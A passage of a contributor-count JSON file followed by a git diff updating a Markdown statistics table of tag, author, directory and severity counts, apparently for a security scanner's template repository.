miller","count":1},{"name":"floriandewald","count":1},{"name":"akshansh","count":1},{"name":"0xrod","count":1},{"name":"hotpot","count":1},{"name":"skylark-lab","count":1},{"name":"hazana","count":1},{"name":"aresx","count":1},{"name":"myst7ic","count":1},{"name":"ooooooo_q","count":1},{"name":"bywalks","count":1},{"name":"aaronchen0","count":1},{"name":"mchklt","count":1},{"name":"0xparth","count":1},{"name":"ayadi","count":1},{"name":"rumble773","count":1},{"name":"shockwave","count":1},{"name":"zhenwarx","count":1},{"name":"babybash","count":1},{"name":"jteles","count":1},{"name":"sdcampbell","count":1},{"name":"k3rwin","count":1},{"name":"mabdullah22","count":1},{"name":"arjunchandarana","count":1},{"name":"luqmaan hadia","count":1},{"name":"paper-pen","count":1},{"name":"hlop","count":1},{"name":"qlkwej","count":1},{"name":"savik","count":1},{"name":"ky9oss","count":1},{"name":"djoevanka","count":1},{"name":"rotemreiss","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hyunsoo-ds","count":1},{"name":"jeya seelan","count":1},{"name":"lady_bug","count":1},{"name":"lark lab","count":1},{"name":"natto97","count":1},{"name":"jrolf","count":1},{"name":"alex","count":1},{"name":"miryangjung","count":1},{"name":"davidfegyver","count":1},{"name":"mayankpandey01","count":1},{"name":"luciannitescu","count":1},{"name":"sshell","count":1},{"name":"west-wise","count":1},{"name":"sinsinology","count":1},{"name":"sherlocksecurity","count":1},{"name":"shivanshkhari","count":1},{"name":"sickwell","count":1},{"name":"oscarintherocks","count":1},{"name":"bartu utku sarp","count":1},{"name":"juicypotato1","count":1},{"name":"p-l-","count":1},{"name":"yusakie","count":1},{"name":"elder tao","count":1},{"name":"imhunterand","count":1},{"name":"stupidfish","count":1},{"name":"dali","count":1},{"name":"screamy","count":1},{"name":"denandz","count":1},{"name":"phillipo","count":1},{"name":"nytr0gen","count":1},{"name":"unkl4b","count":1},{"name":"evan rubinstien","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"s1r1us","count":1},{"name":"queencitycyber","count":1},{"name":"f1she3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kurohost","count":1},{"name":"aaban solutions","count":1},{"name":"olewagner","count":1},{"name":"regala_","count":1},{"name":"exid","count":1},{"name":"blckraven","count":1},{"name":"nielsing","count":1},{"name":"lingtren","count":1},{"name":"mordavid","count":1},{"name":"0xd0ff9","count":1},{"name":"xstp","count":1},{"name":"orpheus","count":1},{"name":"carlosvieira","count":1},{"name":"gpiechnik2","count":1},{"name":"pphuahua","count":1},{"name":"jc175","count":1},{"name":"momen eldawakhly","count":1},{"name":"pwnwithlove","count":1},{"name":"nobody","count":1},{"name":"elitebaz","count":1},{"name":"5up3r541y4n","count":1},{"name":"yuansec","count":1},{"name":"michal-mikolas","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"pjborah","count":1},{"name":"sanineng","count":1},{"name":"husain","count":1},{"name":"kresec","count":1},{"name":"ahmed abou-ela","count":1},{"name":"dorkerdevil","count":1},{"name":"berkdusunur","count":1},{"name":"zinminphy0","count":1},{"name":"push4d","count":1},{"name":"0xkayala","count":1},{"name":"miroslavsotak","count":1},{"name":"amnotacat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"2rs3c","count":1},{"name":"tehtbl","count":1},{"name":"brianlam38","count":1},{"name":"barthy.koeln","count":1},{"name":"couskito","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"yaser_s","count":1},{"name":"m0ck3d","count":1},{"name":"adrianmf","count":1},{"name":"eremit4","count":1},{"name":"j33n1k4","count":1},{"name":"pdp","count":1},{"name":"mhdsamx","count":1},{"name":"jeya.seelan","count":1},{"name":"kchason","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"liquidsec","count":1},{"name":"sicksec","count":1},{"name":"spac3wh1te","count":1},{"name":"fopina","count":1},{"name":"high","count":1},{"name":"anonymous","count":1},{"name":"daviey","count":1},{"name":"rubina119","count":1},{"name":"pussycat0","count":1},{"name":"shivampand3y","count":1},{"name":"naglis","count":1},{"name":"xcapri","count":1},{"name":"godfatherorwa","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"lixts","count":1},{"name":"professorabhay","count":1},{"name":"danfaizer","count":1},{"name":"chesterblue","count":1},{"name":"makyotox","count":1},{"name":"adamparsons","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"harryha","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xcharan","count":1},{"name":"vulnspace","count":1},{"name":"ynnirc","count":1},{"name":"anon-artist","count":1},{"name":"dmartyn","count":1},{"name":"sec_hawk","count":1},{"name":"bjxsec","count":1},{"name":"unblvr1","count":1},{"name":"technicaljunkie","count":1},{"name":"numan türle","count":1},{"name":"am0nt31r0","count":1},{"name":"dhiyanesdk","count":1},{"name":"mbmy","count":1},{"name":"michael wedl","count":1},{"name":"yashgoti","count":1},{"name":"gonski","count":1},{"name":"prettyboyaaditya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"iampritam","count":1},{"name":"calumjelrick","count":1},{"name":"0xprial","count":1},{"name":"cravaterouge","count":1},{"name":"b0yd","count":1},{"name":"marcio mendes","count":1},{"name":"gboddin","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mayank_pandey01","count":1},{"name":"youngpope","count":1},{"name":"watchtowr","count":1},{"name":"co0nan","count":1},{"name":"0xh7ml","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"alexrydzak","count":1},{"name":"mrcl0wnlab","count":1},{"name":"shreyapohekar","count":1},{"name":"thelicato","count":1},{"name":"ptonewreckin","count":1},{"name":"jub0bs","count":1},{"name":"ohlinge","count":1},{"name":"notwhy","count":1},{"name":"ruppde","count":1},{"name":"h4sh5","count":1},{"name":"erikowen","count":1},{"name":"exceed","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"vinit989","count":1},{"name":"ledoubletake","count":1},{"name":"secthebit","count":1},{"name":"juliosmelo","count":1},{"name":"clment cruchet","count":1},{"name":"narluin","count":1},{"name":"ipanda","count":1},{"name":"omranisecurity","count":1},{"name":"mantissts","count":1},{"name":"yavolo","count":1},{"name":"rojanrijal","count":1},{"name":"ldionmarcil","count":1},{"name":"philippdelteil","count":1},{"name":"pry0cc","count":1},{"name":"joaonevess","count":1},{"name":"b0rn2r00t","count":1},{"name":"realexp3rt","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"pudsec","count":1},{"name":"httpvoid","count":1},{"name":"ok_bye_now","count":1},{"name":"ahmetpergamum","count":1},{"name":"manuelbua","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"metascan","count":1},{"name":"nerrorsec","count":1},{"name":"phyr3wall","count":1},{"name":"f0xy","count":1},{"name":"win3zz","count":1},{"name":"kabirsuda","count":1},{"name":"remonsec","count":1},{"name":"dale clarke","count":1},{"name":"rinolock","count":1},{"name":"udyz","count":1},{"name":"jbertman","count":1},{"name":"allenwest24","count":1},{"name":"affix","count":1},{"name":"pepitoh","count":1},{"name":"manasmbellani","count":1},{"name":"invisiblethreat","count":1},{"name":"omarkurt","count":1},{"name":"chron0x","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"un-fmunozs","count":1},{"name":"mariam tariq","count":1},{"name":"jacalynli","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"hakimkt","count":1},{"name":"ph33rr","count":1},{"name":"jiheon-dev","count":1},{"name":"nuts7","count":1},{"name":"shiva (strobes security)","count":1},{"name":"noobexploiter","count":1},{"name":"patrick pirker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"th3r4id","count":1},{"name":"zn9988","count":1},{"name":"pascalheidmann","count":1},{"name":"lamscun","count":1},{"name":"ramkrishna sawant","count":1}],"directory":[{"name":"http","count":7477},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":57},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3683},{"name":"high","count":1728},{"name":"medium","count":1520},{"name":"critical","count":1035},{"name":"low","count":263},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 6ddbad3911..2224519a71 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5384 +1,5410 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | -| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | -| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | -| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | -| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | -| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | -| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | +| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | +| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | +| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | +| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | +| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | +| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 57 | | | | | +| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | | edb | 599 | theamanrawat | 223 | headless | 11 | | | | | -| rce | 591 | r3y3r53 | 200 | contributors.json | 1 | | | | | +| rce | 594 | r3y3r53 | 200 | contributors.json | 1 | | | | | | packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| wpscan | 495 | gy741 | 158 | cves.json | 1 | | | | | -| cve2021 | 491 | rxerium | 141 | | | | | | | -| cve2022 | 476 | sleepingbag945 | 132 | | | | | | | -| wp | 419 | righettod | 131 | | | | | | | -| cve2023 | 364 | arafatansari | 118 | | | | | | | -| unauth | 363 | tess | 109 | | | | | | | -| sqli | 352 | pdresearch | 81 | | | | | | | -| file | 346 | iamnoooob | 68 | | | | | | | -| authenticated | 342 | madrobot | 65 | | | | | | | -| intrusive | 299 | idealphase | 65 | | | | | | | -| kev | 268 | zzeitlin | 64 | | | | | | | -| login | 259 | rootxharsh | 61 | | | | | | | -| detect | 259 | akincibor | 59 | | | | | | | +| wpscan | 497 | gy741 | 158 | cves.json | 1 | | | | | +| cve2021 | 491 | rxerium | 142 | | | | | | | +| cve2022 | 476 | righettod | 141 | | | | | | | +| wp | 421 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 374 | arafatansari | 118 | | | | | | | +| unauth | 366 | tess | 109 | | | | | | | +| sqli | 357 | pdresearch | 82 | | | | | | | +| file | 346 | iamnoooob | 69 | | | | | | | +| authenticated | 341 | idealphase | 66 | | | | | | | +| intrusive | 300 | madrobot | 65 | | | | | | | +| detect | 283 | zzeitlin | 64 | | | | | | | +| login | 276 | rootxharsh | 62 | | | | | | | +| kev | 268 | akincibor | 59 | | | | | | | | cve2020 | 257 | for3stco1d | 55 | | | | | | | | token-spray | 243 | philippedelteil | 53 | | | | | | | -| oast | 221 | edoardottt | 42 | | | | | | | -| config | 220 | gaurang | 42 | | | | | | | -| top-200 | 215 | johnk3r | 40 | | | | | | | -| default-login | 211 | j4vaovo | 35 | | | | | | | -| osint-social | 210 | c-sh0 | 35 | | | | | | | -| network | 194 | adam crosser | 31 | | | | | | | -| token | 193 | luisfelipe146 | 31 | | | | | | | -| | 191 | mastercho | 29 | | | | | | | -| apache | 188 | ice3man | 29 | | | | | | | +| oast | 222 | gaurang | 42 | | | | | | | +| config | 221 | edoardottt | 42 | | | | | | | +| top-200 | 215 | johnk3r | 41 | | | | | | | +| default-login | 212 | c-sh0 | 35 | | | | | | | +| osint-social | 210 | j4vaovo | 35 | | | | | | | +| token | 193 | adam crosser | 31 | | | | | | | +| | 192 | luisfelipe146 | 31 | | | | | | | +| network | 192 | mastercho | 29 | | | | | | | +| apache | 189 | ice3man | 29 | | | | | | | | devops | 176 | pwnhxl | 28 | | | | | | | -| cve2018 | 169 | hardik-solanki | 24 | | | | | | | -| iot | 166 | organiccrap | 24 | | | | | | | +| cve2018 | 169 | organiccrap | 24 | | | | | | | +| iot | 166 | hardik-solanki | 24 | | | | | | | | cve2019 | 165 | techbrunchfr | 23 | | | | | | | -| keys | 155 | ctflearner | 23 | | | | | | | -| joomla | 148 | harsh | 23 | | | | | | | +| keys | 155 | harsh | 23 | | | | | | | +| joomla | 148 | ctflearner | 23 | | | | | | | | malware | 142 | ffffffff0x | 22 | | | | | | | | redirect | 135 | parthmalhotra | 20 | | | | | | | -| aws | 133 | sullo | 18 | | | | | | | -| cloud | 132 | cckuailong | 18 | | | | | | | -| auth-bypass | 129 | 0xpugazh | 16 | | | | | | | -| ssrf | 119 | shaikhyaser | 16 | | | | | | | -| phishing | 117 | random-robbie | 16 | | | | | | | +| aws | 133 | cckuailong | 18 | | | | | | | +| cloud | 132 | kazgangap | 18 | | | | | | | +| auth-bypass | 131 | sullo | 18 | | | | | | | +| ssrf | 119 | bhutch | 17 | | | | | | | +| install | 118 | 0xpugazh | 16 | | | | | | | +| phishing | 117 | shaikhyaser | 16 | | | | | | | | amazon | 116 | lu4nx | 16 | | | | | | | -| files | 113 | sheikhrishad | 15 | | | | | | | -| cve2010 | 112 | unapibageek | 15 | | | | | | | -| cms | 110 | bhutch | 15 | | | | | | | -| cve2017 | 110 | pr3r00t | 15 | | | | | | | -| router | 108 | milo2012 | 14 | | | | | | | -| install | 107 | kazgangap | 14 | | | | | | | -| top-100 | 100 | dogasantos | 14 | | | | | | | -| disclosure | 89 | r3dg33k | 14 | | | | | | | -| aws-cloud-config | 89 | tenbird | 14 | | | | | | | -| linux | 83 | melbadry9 | 13 | | | | | | | -| code | 81 | 0ri2n | 13 | | | | | | | +| files | 113 | random-robbie | 16 | | | | | | | +| cve2010 | 112 | sheikhrishad | 15 | | | | | | | +| cms | 112 | pr3r00t | 15 | | | | | | | +| cve2017 | 110 | unapibageek | 15 | | | | | | | +| router | 108 | r3dg33k | 14 | | | | | | | +| top-100 | 100 | milo2012 | 14 | | | | | | | +| disclosure | 89 | tenbird | 14 | | | | | | | +| aws-cloud-config | 89 | dogasantos | 14 | | | | | | | +| linux | 83 | userdehghani | 14 | | | | | | | +| code | 81 | nullfuzz | 13 | | | | | | | | local | 80 | theabhinavgaur | 13 | | | | | | | -| takeover | 79 | sharath | 13 | | | | | | | -| seclists | 79 | nullfuzz | 13 | | | | | | | -| privesc | 79 | elsfa7110 | 13 | | | | | | | -| tokens | 78 | suman_kar | 12 | | | | | | | -| fileupload | 76 | kazet | 12 | | | | | | | -| oracle | 70 | meme-lord | 12 | | | | | | | +| privesc | 79 | sharath | 13 | | | | | | | +| seclists | 79 | melbadry9 | 13 | | | | | | | +| takeover | 79 | 0ri2n | 13 | | | | | | | +| tokens | 78 | elsfa7110 | 13 | | | | | | | +| fileupload | 76 | meme-lord | 12 | | | | | | | +| oracle | 71 | suman_kar | 12 | | | | | | | +| cve2024 | 69 | kazet | 12 | | | | | | | | oss | 67 | cyllective | 11 | | | | | | | | cisco | 66 | wdahlenb | 11 | | | | | | | -| cve2024 | 63 | 0x240x23elu | 10 | | | | | | | -| js | 62 | nadino | 10 | | | | | | | -| adobe | 62 | alph4byt3 | 10 | | | | | | | -| ir | 61 | random_robbie | 10 | | | | | | | -| cve2015 | 59 | co5mos | 10 | | | | | | | +| js | 63 | alph4byt3 | 10 | | | | | | | +| adobe | 62 | nadino | 10 | | | | | | | +| ir | 61 | 0x240x23elu | 10 | | | | | | | | huntr | 59 | hackergautam | 10 | | | | | | | +| cve2015 | 59 | random_robbie | 10 | | | | | | | | atlassian | 57 | logicalhunter | 10 | | | | | | | -| cve2016 | 57 | fabaff | 9 | | | | | | | -| google | 56 | adamcrosser | 9 | | | | | | | -| vmware | 56 | initstring | 9 | | | | | | | -| enum | 55 | oppsec | 9 | | | | | | | -| c2 | 55 | emadshanab | 9 | | | | | | | -| logs | 48 | olearycrew | 9 | | | | | | | -| tenable | 48 | momika233 | 9 | | | | | | | -| log4j | 47 | _0xf4n9x_ | 8 | | | | | | | -| hackerone | 46 | iamthefrogy | 8 | | | | | | | -| vulhub | 46 | veshraj | 8 | | | | | | | -| aem | 45 | aashiq | 8 | | | | | | | -| osint-gaming | 45 | irshad ahamed | 8 | | | | | | | -| jndi | 44 | that_juan_ | 8 | | | | | | | -| cve2014 | 44 | noraj | 8 | | | | | | | -| php | 44 | zh | 8 | | | | | | | -| debug | 44 | huta0 | 7 | | | | | | | -| deserialization | 43 | tarunkoyalwar | 7 | | | | | | | -| plugin | 42 | amit-jd | 7 | | | | | | | -| generic | 42 | caspergn | 7 | | | | | | | -| traversal | 42 | me_dheeraj | 7 | | | | | | | +| cve2016 | 57 | co5mos | 10 | | | | | | | +| enum | 56 | initstring | 9 | | | | | | | +| google | 56 | emadshanab | 9 | | | | | | | +| vmware | 56 | olearycrew | 9 | | | | | | | +| c2 | 55 | momika233 | 9 | | | | | | | +| logs | 48 | adamcrosser | 9 | | | | | | | +| tenable | 48 | oppsec | 9 | | | | | | | +| log4j | 47 | fabaff | 9 | | | | | | | +| hackerone | 46 | that_juan_ | 8 | | | | | | | +| vulhub | 46 | aashiq | 8 | | | | | | | +| aem | 45 | noraj | 8 | | | | | | | +| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | +| php | 44 | veshraj | 8 | | | | | | | +| jndi | 44 | zh | 8 | | | | | | | +| cve2014 | 44 | irshad ahamed | 8 | | | | | | | +| debug | 44 | iamthefrogy | 8 | | | | | | | +| deserialization | 43 | divya_mudgal | 7 | | | | | | | +| osint-porn | 42 | leovalcante | 7 | | | | | | | +| traversal | 42 | nodauf | 7 | | | | | | | +| oa | 42 | caspergn | 7 | | | | | | | +| generic | 42 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| osint-porn | 42 | its0x08 | 7 | | | | | | | -| osint-hobby | 42 | kophjager007 | 7 | | | | | | | -| oa | 42 | techryptic (@tech) | 7 | | | | | | | -| springboot | 41 | randomstr1ng | 7 | | | | | | | -| misc | 39 | dr_set | 7 | | | | | | | -| cnvd | 39 | harshbothra_ | 7 | | | | | | | -| microsoft | 38 | divya_mudgal | 7 | | | | | | | -| injection | 38 | leovalcante | 7 | | | | | | | -| jira | 37 | nodauf | 7 | | | | | | | -| listing | 37 | gitlab red team | 6 | | | | | | | -| kubernetes | 37 | __fazal | 6 | | | | | | | -| cti | 36 | clem9669 | 6 | | | | | | | +| plugin | 42 | amit-jd | 7 | | | | | | | +| osint-hobby | 42 | huta0 | 7 | | | | | | | +| springboot | 41 | kophjager007 | 7 | | | | | | | +| cnvd | 40 | its0x08 | 7 | | | | | | | +| misc | 39 | techryptic (@tech) | 7 | | | | | | | +| microsoft | 38 | dr_set | 7 | | | | | | | +| injection | 38 | randomstr1ng | 7 | | | | | | | +| jira | 37 | tarunkoyalwar | 7 | | | | | | | +| listing | 37 | harshbothra_ | 7 | | | | | | | +| kubernetes | 37 | gitlab red team | 6 | | | | | | | | ibm | 36 | evan rubinstein | 6 | | | | | | | -| osint-misc | 35 | justaacat | 6 | | | | | | | -| sap | 34 | ja1sh | 6 | | | | | | | -| ssl | 33 | megamansec | 6 | | | | | | | -| fuzz | 33 | imnightmaree | 6 | | | | | | | -| miscellaneous | 32 | byt3bl33d3r | 6 | | | | | | | -| osint-tech | 31 | pentest_swissky | 6 | | | | | | | -| ec2 | 30 | xelkomy | 6 | | | | | | | -| tls | 30 | praetorian-thendrickson | 6 | | | | | | | -| osint-coding | 30 | pathtaga | 6 | | | | | | | -| dlink | 29 | puzzlepeaches | 6 | | | | | | | -| wp-theme | 29 | hahwul | 6 | | | | | | | -| gitlab | 28 | devang-solanki | 6 | | | | | | | -| api | 28 | forgedhallpass | 6 | | | | | | | -| ssh | 28 | shine | 5 | | | | | | | -| k8s | 28 | ganofins | 5 | | | | | | | +| cti | 36 | __fazal | 6 | | | | | | | +| osint-misc | 35 | clem9669 | 6 | | | | | | | +| sap | 34 | pathtaga | 6 | | | | | | | +| ssl | 33 | forgedhallpass | 6 | | | | | | | +| fuzz | 33 | megamansec | 6 | | | | | | | +| miscellaneous | 32 | pentest_swissky | 6 | | | | | | | +| osint-tech | 31 | hahwul | 6 | | | | | | | +| osint-coding | 30 | byt3bl33d3r | 6 | | | | | | | +| tls | 30 | imnightmaree | 6 | | | | | | | +| ec2 | 30 | puzzlepeaches | 6 | | | | | | | +| wp-theme | 30 | ja1sh | 6 | | | | | | | +| dlink | 30 | xelkomy | 6 | | | | | | | +| k8s | 28 | praetorian-thendrickson | 6 | | | | | | | +| api | 28 | devang-solanki | 6 | | | | | | | +| gitlab | 28 | justaacat | 6 | | | | | | | +| fortinet | 28 | kh4sh3i | 5 | | | | | | | | bestwebsoft | 27 | andreluna | 5 | | | | | | | -| fortinet | 27 | defr0ggy | 5 | | | | | | | | citrix | 27 | your3cho | 5 | | | | | | | -| proxy | 26 | s0obi | 5 | | | | | | | -| cve2012 | 26 | panch0r3d | 5 | | | | | | | -| lfr | 25 | lucky0x0d | 5 | | | | | | | -| firewall | 25 | gtrrnr | 5 | | | | | | | -| manageengine | 25 | podalirius | 5 | | | | | | | -| weaver | 25 | r3naissance | 5 | | | | | | | -| zohocorp | 25 | vicrack | 5 | | | | | | | -| osint-images | 24 | prajiteshsingh | 5 | | | | | | | -| osint-business | 24 | robotshell | 5 | | | | | | | -| dns | 24 | powerexploit | 5 | | | | | | | -| admin | 24 | joanbono | 5 | | | | | | | -| osint-finance | 24 | yanyun | 5 | | | | | | | -| osint-shopping | 24 | mr-xn | 5 | | | | | | | -| zoho | 24 | kh4sh3i | 5 | | | | | | | -| yonyou | 23 | arm!tage | 5 | | | | | | | -| tomcat | 23 | r12w4n | 5 | | | | | | | -| xxe | 23 | 3th1c_yuk1 | 4 | | | | | | | -| audit | 23 | jpg0mez | 4 | | | | | | | -| stored-xss | 23 | h1ei1 | 4 | | | | | | | -| file-upload | 23 | pulsesecurity.co.nz | 4 | | | | | | | -| prestashop | 22 | wisnupramoedya | 4 | | | | | | | -| cicd | 22 | cookiehanhoan | 4 | | | | | | | -| s3 | 22 | shankar acharya | 4 | | | | | | | -| msf | 21 | heeress | 4 | | | | | | | -| github | 21 | nybble04 | 4 | | | | | | | -| printer | 21 | ggranjus | 4 | | | | | | | +| proxy | 27 | r3naissance | 5 | | | | | | | +| firewall | 26 | defr0ggy | 5 | | | | | | | +| cve2012 | 26 | s0obi | 5 | | | | | | | +| lfr | 26 | joanbono | 5 | | | | | | | +| ssh | 25 | vicrack | 5 | | | | | | | +| weaver | 25 | panch0r3d | 5 | | | | | | | +| manageengine | 25 | r12w4n | 5 | | | | | | | +| zohocorp | 25 | gtrrnr | 5 | | | | | | | +| zoho | 24 | powerexploit | 5 | | | | | | | +| osint-shopping | 24 | shine | 5 | | | | | | | +| osint-finance | 24 | ganofins | 5 | | | | | | | +| dns | 24 | prajiteshsingh | 5 | | | | | | | +| osint-business | 24 | lucky0x0d | 5 | | | | | | | +| osint-images | 24 | mr-xn | 5 | | | | | | | +| admin | 23 | podalirius | 5 | | | | | | | +| audit | 23 | yanyun | 5 | | | | | | | +| stored-xss | 23 | robotshell | 5 | | | | | | | +| xxe | 23 | arm!tage | 5 | | | | | | | +| yonyou | 23 | pulsesecurity.co.nz | 4 | | | | | | | +| file-upload | 23 | m4lwhere | 4 | | | | | | | +| tomcat | 23 | heeress | 4 | | | | | | | +| s3 | 22 | tanq16 | 4 | | | | | | | +| cicd | 22 | shankar acharya | 4 | | | | | | | +| github | 22 | scent2d | 4 | | | | | | | +| prestashop | 22 | xxcdd | 4 | | | | | | | +| weblogic | 21 | dadevel | 4 | | | | | | | +| printer | 21 | wisnupramoedya | 4 | | | | | | | | ecology | 21 | dolev farhi | 4 | | | | | | | -| weblogic | 21 | incogbyte | 4 | | | | | | | -| dast | 21 | dadevel | 4 | | | | | | | -| jenkins | 20 | k0pak4 | 4 | | | | | | | -| camera | 20 | e_schultze_ | 4 | | | | | | | -| hp | 19 | scent2d | 4 | | | | | | | -| grafana | 19 | 0xr2r | 4 | | | | | | | -| struts | 19 | xxcdd | 4 | | | | | | | -| wavlink | 19 | ice3man543 | 4 | | | | | | | -| rukovoditel | 19 | m4lwhere | 4 | | | | | | | -| ftp | 19 | lum8rjack | 4 | | | | | | | -| cve2011 | 18 | iamnooob | 4 | | | | | | | -| android | 18 | king-alexander | 4 | | | | | | | -| osint-music | 18 | tanq16 | 4 | | | | | | | -| ruijie | 18 | _generic_human_ | 3 | | | | | | | -| coldfusion | 18 | vsh00t | 3 | | | | | | | -| confluence | 17 | canberbamber | 3 | | | | | | | -| service | 17 | sushantkamble | 3 | | | | | | | -| mail | 17 | ambassify | 3 | | | | | | | -| nginx | 17 | skeltavik | 3 | | | | | | | -| azure | 17 | atomiczsec | 3 | | | | | | | -| node.js | 17 | c4sper0 | 3 | | | | | | | -| backup | 16 | splint3r7 | 3 | | | | | | | -| honeypot | 16 | me9187 | 3 | | | | | | | -| magento | 16 | yuzhe-zhang-0 | 3 | | | | | | | -| vpn | 16 | fxploit | 3 | | | | | | | -| status | 16 | thomas_from_offensity | 3 | | | | | | | -| osint-blog | 16 | binaryfigments | 3 | | | | | | | -| microweber | 16 | farish | 3 | | | | | | | -| alibaba | 16 | xianke | 3 | | | | | | | -| jarm | 16 | alifathi-h1 | 3 | | | | | | | -| cve2009 | 16 | fyoorer | 3 | | | | | | | -| rconfig | 16 | lark-lab | 3 | | | | | | | -| bypass | 15 | salts | 3 | | | | | | | -| zyxel | 15 | aringo | 3 | | | | | | | -| nodejs | 15 | 0w4ys | 3 | | | | | | | -| seeyon | 15 | davidmckennirey | 3 | | | | | | | -| cve2008 | 15 | andydoering | 3 | | | | | | | -| dashboard | 15 | flx | 3 | | | | | | | -| java | 15 | bernardofsr | 3 | | | | | | | -| cve2013 | 15 | badboycxcc | 3 | | | | | | | -| cnvd2021 | 15 | userdehghani | 3 | | | | | | | -| backdoor | 15 | impramodsargar | 3 | | | | | | | -| ruby | 15 | whoever | 3 | | | | | | | -| tongda | 15 | matt galligan | 3 | | | | | | | -| woocommerce | 15 | randomrobbie | 3 | | | | | | | -| setup | 14 | true13 | 3 | | | | | | | -| osint-art | 14 | isacaya | 3 | | | | | | | -| login-check | 14 | arcc | 3 | | | | | | | -| ssti | 14 | e1a | 3 | | | | | | | -| windows | 14 | ph33r | 3 | | | | | | | +| dast | 21 | lum8rjack | 4 | | | | | | | +| msf | 21 | king-alexander | 4 | | | | | | | +| jenkins | 20 | iamnooob | 4 | | | | | | | +| camera | 20 | nybble04 | 4 | | | | | | | +| rukovoditel | 19 | jpg0mez | 4 | | | | | | | +| ftp | 19 | 0xr2r | 4 | | | | | | | +| struts | 19 | ggranjus | 4 | | | | | | | +| wavlink | 19 | e_schultze_ | 4 | | | | | | | +| hp | 19 | ice3man543 | 4 | | | | | | | +| grafana | 19 | k0pak4 | 4 | | | | | | | +| android | 18 | 3th1c_yuk1 | 4 | | | | | | | +| cve2011 | 18 | incogbyte | 4 | | | | | | | +| osint-music | 18 | h1ei1 | 4 | | | | | | | +| ruijie | 18 | cookiehanhoan | 4 | | | | | | | +| coldfusion | 18 | unstabl3 | 3 | | | | | | | +| vpn | 17 | splint3r7 | 3 | | | | | | | +| confluence | 17 | swissky | 3 | | | | | | | +| azure | 17 | z3bd | 3 | | | | | | | +| honeypot | 17 | skeltavik | 3 | | | | | | | +| nginx | 17 | flx | 3 | | | | | | | +| node.js | 17 | binaryfigments | 3 | | | | | | | +| service | 17 | true13 | 3 | | | | | | | +| mail | 17 | evergreencartoons | 3 | | | | | | | +| microweber | 16 | randomrobbie | 3 | | | | | | | +| cve2009 | 16 | emenalf | 3 | | | | | | | +| jarm | 16 | e1a | 3 | | | | | | | +| status | 16 | j3ssie | 3 | | | | | | | +| alibaba | 16 | jarijaas | 3 | | | | | | | +| backup | 16 | whoever | 3 | | | | | | | +| rconfig | 16 | sushantkamble | 3 | | | | | | | +| magento | 16 | cheesymoon | 3 | | | | | | | +| osint-blog | 16 | matt galligan | 3 | | | | | | | +| woocommerce | 15 | me9187 | 3 | | | | | | | +| cve2013 | 15 | _generic_human_ | 3 | | | | | | | +| ssti | 15 | johnjhacking | 3 | | | | | | | +| setup | 15 | salts | 3 | | | | | | | +| nodejs | 15 | badboycxcc | 3 | | | | | | | +| tongda | 15 | aringo | 3 | | | | | | | +| cnvd2021 | 15 | 